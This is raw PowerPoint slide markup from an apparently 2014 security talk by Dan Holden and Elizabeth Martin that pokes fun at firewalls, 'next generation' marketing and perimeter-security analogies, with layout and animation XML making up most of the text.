                                    <p:animMotion origin="layout" path="M 0.2125 -0.14074 C 0.20799 -0.13171 0.20243 -0.12615 0.19583 -0.12037 C 0.19045 -0.10972 0.19531 -0.11759 0.18333 -0.1074 C 0.17795 -0.10278 0.17083 -0.09629 0.16667 -0.09074 C 0.16545 -0.08935 0.16528 -0.08634 0.16389 -0.08518 C 0.16042 -0.08287 0.15642 -0.08148 0.15278 -0.07963 C 0.13802 -0.06041 0.11701 -0.05301 0.1 -0.03912 C 0.09306 -0.03356 0.08802 -0.02639 0.08056 -0.02222 C 0.07517 -0.01967 0.0691 -0.01944 0.06389 -0.01666 C 0.0434 -0.00648 0.02188 2.22222E-6 3.61111E-6 2.22222E-6 " pathEditMode="relative" ptsTypes="fffffffffA">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="3000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="31" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.16389 -0.17408 C 0.15573 -0.14167 0.13906 -0.11366 0.12778 -0.08334 C 0.12587 -0.07848 0.12569 -0.07339 0.12361 -0.06876 C 0.12014 -0.06158 0.11562 -0.05556 0.11111 -0.05001 C 0.09982 -0.03681 0.096 -0.04121 0.08194 -0.03334 C 0.0566 -0.01968 0.05521 -0.01227 0.02778 -0.00927 C 0.02118 -0.00764 0.01441 -0.00718 0.00833 -0.00394 C -0.00035 0.00046 0.00573 -7.77778E-6 -5.55556E-7 -7.77778E-6 " pathEditMode="relative" ptsTypes="fffffffA">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="3600" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="23"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="33" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.19028 -0.13889 C -0.18854 -0.13149 -0.18767 -0.12825 -0.18194 -0.12593 C -0.17899 -0.12177 -0.17691 -0.11667 -0.17361 -0.11297 C -0.16667 -0.1044 -0.15851 -0.09723 -0.15139 -0.08889 C -0.13958 -0.07454 -0.12847 -0.0595 -0.11389 -0.05001 C -0.10278 -0.02038 -0.08351 -0.01343 -0.06111 -0.00741 C -0.05555 -0.00602 -0.05139 -0.00186 -0.04583 -6.2963E-6 C -0.04583 -6.2963E-6 -0.03333 0.0037 -0.02778 0.00555 C -0.02309 0.00486 -0.00382 0.00486 -1.38889E-6 -6.2963E-6 " pathEditMode="relative" ptsTypes="ffffffffA">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="3000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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3.jpe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2.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.pn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0F4ABA-3E7D-2046-BA0C-DEC34A1325D7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/6/2014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244EEE-C19F-5A49-91D5-846007125831}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6152971"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="71B5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8371" y="155358"/>
            <a:ext cx="8489904" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">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29184" y="1014984"/>
            <a:ext cx="8476029" cy="223445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71B532"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{AE4F6114-FE43-B34A-B99B-6F1FD61370EE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 15" descr="arbor logo"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="328371" y="6203105"/>
            <a:ext cx="1423988" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6840587"/>
            <a:ext cx="9163050" cy="9525"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="71B53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0" y="15776"/>
            <a:ext cx="9163050" cy="9525"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="71B53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7" name="Picture 9" descr="eloqua_ppt_header_grey_rule.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:srcRect t="-260001" b="-260001"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="41275" y="808038"/>
            <a:ext cx="9067800" cy="79375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2" descr="O:\Industry Contributions\SecureChicago\logo.JP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981199" y="5888711"/>
            <a:ext cx="1991361" cy="790828"/>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1" r:id="rId4"/>
    <p:sldLayoutId id="2147483652" r:id="rId5"/>
    <p:sldLayoutId id="2147483653" r:id="rId6"/>
    <p:sldLayoutId id="2147483654" r:id="rId7"/>
    <p:sldLayoutId id="2147483663" r:id="rId8"/>
  </p:sldLayoutIdLst>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="3000" b="1" kern="1200">
          <a:solidFill>
            <a:srgbClr val="71B532"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="227013" indent="-227013" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:srgbClr val="71B532"/>
        </a:buClr>
        <a:buFont typeface="Arial"/>
        <a:buChar char="•"/>
        <a:defRPr sz="3000" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="627063" indent="-282575" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:srgbClr val="71B532"/>
        </a:buClr>
        <a:buFont typeface="Arial"/>
        <a:buChar char="–"/>
        <a:defRPr sz="2700" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Arial"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1089025" indent="-174625" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:srgbClr val="71B532"/>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Clr>
          <a:srgbClr val="71B532"/>
        </a:buClr>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Clr>
          <a:srgbClr val="71B532"/>
        </a:buClr>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2438" y="4269477"/>
            <a:ext cx="8060436" cy="954932"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="71B532"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Pissing Down The Leg Of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="71B532"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="71B532"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Much Of Our Collective Careers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342569" y="5224409"/>
            <a:ext cx="8060436" cy="1438855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="2" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="71B532"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0" algn="ctr" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="71B532"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2700" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0" algn="ctr" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="71B532"/>
              </a:buClr>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Clr>
                <a:srgbClr val="71B532"/>
              </a:buClr>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Clr>
                <a:srgbClr val="71B532"/>
              </a:buClr>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spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dan Holden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Director, ASERT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>desmondholden</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Elizabeth Martin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Director, Security Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>elizmmartin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291214" y="1489881"/>
            <a:ext cx="2407920" cy="485346"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="O:\Industry Contributions\SecureChicago\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2091" y="2033950"/>
            <a:ext cx="2915610" cy="115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358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Firewall Analogy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4048751" y="966829"/>
            <a:ext cx="3766161" cy="56595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334882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552862" y="1905000"/>
            <a:ext cx="7620000" cy="4953000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4127337" cy="4127337"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13276201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3528447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2126623" y="103541"/>
            <a:ext cx="6502222" cy="6690064"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4457823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Better Analogy for Perimeter Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947182" y="1227758"/>
            <a:ext cx="5282874" cy="4192757"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30593167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Firewalls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328371" y="1017588"/>
            <a:ext cx="8489904" cy="5927777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>65k perfectly good &amp; useable ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apparently we only need approximately 3 now?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Duh…we only need 3…everyone figured that out right about 2002 or so….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Guess what, attackers figured that out too</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now that firewalls segment everything</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What the hell is an NGFW anyway?!?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Why </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is everything a “Next Generation”???</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More like “Now Generation”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What does that buy me? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>doesn’t it buy me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102965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AutoShape 1"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2589213" y="2286000"/>
            <a:ext cx="3962400" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D6D6D6"/>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endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7170" name="Group 2"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="2970213"/>
            <a:ext cx="2971800" cy="1144587"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2971801" cy="1143001"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7171" name="AutoShape 3"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="-1" y="0"/>
              <a:ext cx="2971802" cy="114300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56A8B9"/>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pPr>
              <a:endParaRPr lang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7172" name="AutoShape 4"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="435209" y="373285"/>
              <a:ext cx="1978026" cy="3964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defTabSz="914400">
                <a:spcBef>
                  <a:spcPts val="500"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="FFA900"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                  <a:sym typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Confidentiality</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7173" name="Group 5"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="2970213"/>
            <a:ext cx="2971800" cy="1144587"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2971801" cy="1143001"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7174" name="AutoShape 6"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="-1" y="0"/>
              <a:ext cx="2971802" cy="114300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56A8B9"/>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pPr>
              <a:endParaRPr lang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7175" name="AutoShape 7"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="435209" y="373285"/>
